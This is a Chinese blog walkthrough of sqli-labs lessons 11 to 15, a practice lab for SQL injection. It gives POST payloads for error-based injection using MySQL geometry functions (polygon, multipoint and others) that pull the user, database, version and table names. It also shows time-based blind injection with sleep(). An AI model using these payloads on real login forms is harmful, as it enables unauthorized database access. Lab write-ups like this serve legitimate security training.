sql-liabs通关11-15

已于 2023-03-25 14:40:10 修改
阅读量109 收藏
点赞数
分类专栏: 靶机及靶场通关 文章标签: sql 数据库 mysql
于 2023-01-20 20:08:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/128742891
版权

目录

 

1.lesson-11 Polygon报错注入

2.lesson-12 MultiPoint报错注入

 3.lesson-13  multilinestring报错注入

 4.lesson-14 LINESTRING报错注入

5.lesson-15 时间或布尔盲注

1.lesson-11 Polygon报错注入

为单引号的字符型注入

判断注入类型:

使用hackbar的post模块发包,用户名和密码都可以

uname=a&passwd=a%27&submit=Submit

 查用户名

uname=a&passwd=a' and polygon((select * from(select * from(select user())a)b))%23&submit=Submit

查表名:

uname=a&passwd=a' and polygon((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))%23&submit=Submit

2.lesson-12 MultiPoint报错注入

为双引号括号的字符型注入

 判断注入类型:

uname=a&passwd=a")%23&submit=Submit

 查数据库:

uname=a&passwd=a") and multipoint((select * from(select * from(select database())a)b));%23&submit=Submit

查数据表名:

uname=a&passwd=a") and multipoint((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))%23&submit=Submit

 3.lesson-13  multilinestring报错注入

为单引号括号的字符型注入 

判断注入类型:

uname=a&passwd=a')%23&submit=Submit

 查版本:

uname=a&passwd=a') and multilinestring((select * from(select * from(select version())a)b))%23&submit=Submit

 查数据表名:

uname=a&passwd=a') and multilinestring((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))%23&submit=Submit

 4.lesson-14 LINESTRING报错注入

为双引号的字符型注入

判断注入类型:

uname=a&passwd=a"-- +&submit=Submit

 查用户:

uname=a&passwd=a"and LINESTRING((select * from(select * from(select user())a)b))-- +&submit=Submit

 查表名:

uname=a&passwd=a"and LINESTRING((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))-- +&submit=Submit

5.lesson-15 时间或布尔盲注

为单引号的字符型注入

使用时间注入

判断注入类型:

uname=a' or sleep(3)-- +&passwd=1&submit=Submit

 或

uname=admin' and sleep(5)-- +&passwd=a&submit=Submit

布尔无法判断闭合符号

这里使用and 或or都可以,使用and时需要注意需要知道用户名,因为判断条件问题,必须为true时,sleep才会延迟,使用or不需要知道用户名,因为or不管真假都为true,都能执行sleep延迟

使用or要注意sleep值要变小一点,or会查所有用户名但不会输出,所以执行时间肯定是设置值的几倍

就像:

 其他参考前面的内容

lesson-15参考文章:

(19条消息) SQLi-labs(Less-15、Less-16)_info-sec的博客-CSDN博客https://blog.csdn.net/weixin_41182861/article/details/107727041

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入原理和SQLI-LABS实验环境搭建
wr456wr的博客
03-22 850
SQL注入原理和SQLI-LABS实验环境搭建 文章目录1. sqli-labs实验环境搭建2. 更新kali系统中的火狐浏览器3. 在火狐浏览器中安装hackbar插件4. 熟悉各种闭合方式并通过hackbar插件进行探测5. 熟悉使用hackbar插件,通过order by判断查询字段数熟悉limit的使用熟悉order by的使用 1. sqli-labs实验环境搭建 主机:centos7 ip:192.168.31.128 关闭防火墙并设置开机不启动 systemctl stop firewall
sql-labs通关技巧
03-01
SQL注入常用靶场的通关技巧
sqli-labs闯关小游戏21-65.docx
10-23
这是个关于sql注入的文档,是sqli-labs闯关小游戏二十一关到六十五关的详解,每一关的步骤写得都很详细,前二十关的话我已经发布了博客,有需要的可以下载一下。
sqli-liabs学习SQL注入之旅(第六十一关~第六十五关)
guanjian_ci的博客
05-07 582
六十一关 这一关和前面几关一样,不过这关使用 双括号+单引号 接受参数。 虽然过关操作一样,但是我们还是要多过几遍,熟能生巧!!!
sql-liabs通关6-10
m0_62207170的博客
01-17 177
sql-labs通关
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中的mysql账号密码进行安装数据库的创建 介绍几个函数:   (1)version():查看数据库版本   (2)user():查看当前用户   (3)database():查看使用的数据库   (4) limit :limit子句来分批获取所有数据   (5)group_concat():一次性获取数据库信息。
sql-formatter npm打包后文件
12-14
1、本资源已经对源码NPM工程打包为sql-formatter.min.js 文件可直接引入使用 2、具体说明可见下载后压缩包中的 说明.text 文件 3、相关博客文章 https://blog.csdn.net/guzuoi/article/details/111151290
SQL2022-SSEI-Dev
11-14
SQL2022-SSEI-Dev
x-pack-sql-jdbc-7.9.1.jar
03-04
x-pack-sql-jdbc-7.9.1.jar
sql-server驱动包
最新发布
03-07
sql-server驱动包
sqlilabs过关手册注入天书
08-17
sqlilabs过关手册注入天书
sql-liabs通关1-5
m0_62207170的博客
01-14 212
sqlliab通关
sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 3911
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
sqli-liabs学习SQL注入之旅(第十一关~第二十关)
guanjian_ci的博客
04-22 2683
十一关 可以看到十一关和之前的十关是截然不同,偶尔也得换换口味才有新鲜感嘛!话不多说,开搞! 前言:这里有两个提交框,我们应该从哪里注入呢?这并不是困扰我们的问题。我们在实战中应该多方面测试,两个框都测试一下,那个可以就搞那个咯!多搞点不亏的!咳咳咳。 第一步:判断参数接受的类型。 账号:admin' 密码:1111 页面报错 账号:admin' # 密码:1111 登录成功(说明这一关存在弱口令,但我们要学习的是SQL注入) 账号:admin .
WEB安全-SQL注入基于sqliabs靶场分析原理
weixin_45152278的博客
10-09 1335
基于sqlibas靶场分析SQL注入原理
sqli-liabs学习SQL注入之旅(第二十一关~第三十关)
guanjian_ci的博客
04-23 3043
二十一关 打开这一关,开屏暴击。报错的大致意思是时区没有设置好,我们进入报错的文件,在php代码中加入中国时区的代码即可: date_default_timezone_set("PRC"); 其实不改这个也不影响我们做题目,只是有错不改看着难受而已,页面正常后,开始正题: 第一步:在账号密码框一顿输出后,发现注入点不在外面,只能登录进入里面看看,看到了页面显示了我们的UA、cookie等信息。有点类似第二十关,属于cookie注入!唯一不同的是这一关考察了一个加解密运用,cook.
sqli-liabs通关之旅
weixin_42123571的博客
03-17 708
sqli-liabs通关之旅 第一关 加‘报错 加‘--+正常 ?id=-1' order by 3 --+ 页面正常 ?id=-1' order by 4 --+ 页面错误 判断字段长度为3 确定回显点: id=-1' union select 1,2,3--+ 猜数据库: -1' union select 1,database(),3--+ 猜表名: -1' union sele...
sqli-labs 1-5关
qq_41326328的博客
03-28 1191
这次写一个关于sql注入的闯关游戏,叫sqli-liabs,这个源码在网上搜索一下sqli-liabs源码下载,放到phpstudy环境里, 注意:这里把phpstudy版本调到5.5,别问我为什么,厂长是我的表哥 下面先说一下, 注入分为数字型注入和字符串型注入 区别: ?id=1 and 1=1 ?id=2 and 1=2 回显不一致则为数字型注入,回显一致的话再继续判断 ?di=1’ ...
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值